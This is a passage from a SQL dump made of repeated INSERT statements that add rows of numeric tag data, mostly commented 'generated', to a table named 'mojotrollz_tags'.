0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170353, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170353, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170354, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170355, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170439, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170440, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170441, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170442, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170443, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170444, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170445, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170446, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170447, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170448, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170449, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170450, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170451, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170452, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170453, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170454, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170455, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170456, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170457, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170458, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170459, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170460, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170461, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170462, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170463, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170464, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170465, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170466, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170467, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170468, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170469, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170470, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170471, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170472, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170473, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170474, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170475, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170476, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170477, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170478, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170479, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170480, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170481, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170482, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170483, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170484, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170485, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170486, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170487, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170488, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170489, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170490, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170491, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170492, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170493, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170494, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170495, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170496, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170497, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170498, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170499, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170500, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170501, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170502, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170503, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170504, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170505, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170506, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170507, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170508, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170509, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170510, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170511, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170512, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170513, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170514, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170515, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170516, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170517, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170518, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170519, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170520, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170521, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170522, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170523, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170524, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170525, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170526, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170527, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170528, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170529, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170530, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170531, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170532, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170533, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170534, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170535, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170536, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170537, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170538, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170539, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170540, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170541, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170542, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170543, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170544, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170545, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170546, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170547, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170548, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170549, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170550, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170551, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170552, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170553, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170554, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170555, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170556, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170557, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170558, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170559, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170560, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170561, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170562, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170563, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170564, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170565, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170566, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170567, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170568, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170569, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170570, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170571, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170572, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170573, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170574, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170575, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170576, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170577, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170578, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170579, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170580, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170581, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170582, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170583, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170584, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170592, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170607, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171524, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171525, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171526, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171527, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171528, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171529, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171530, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171531, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171532, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171533, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171534, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171535, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171537, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171538, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171539, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171540, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171541, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171542, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171543, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171544, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171545, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171546, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171547, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171548, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171549, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171550, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171552, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171553, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171555, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171556, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171559, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171560, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171561, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171562, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171563, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171565, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171575, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171577, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171578, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171579, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171580, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171581, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171582, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171583, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171584, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171585, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171586, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171587, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171588, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171589, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171590, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171591, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171592, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171593, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171594, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171595, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171596, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171597, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171598, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171599, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171600, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171601, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171602, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171603, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171604, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171605, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171606, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171607, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171608, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171609, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171610, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171611, 2, 1, 0, 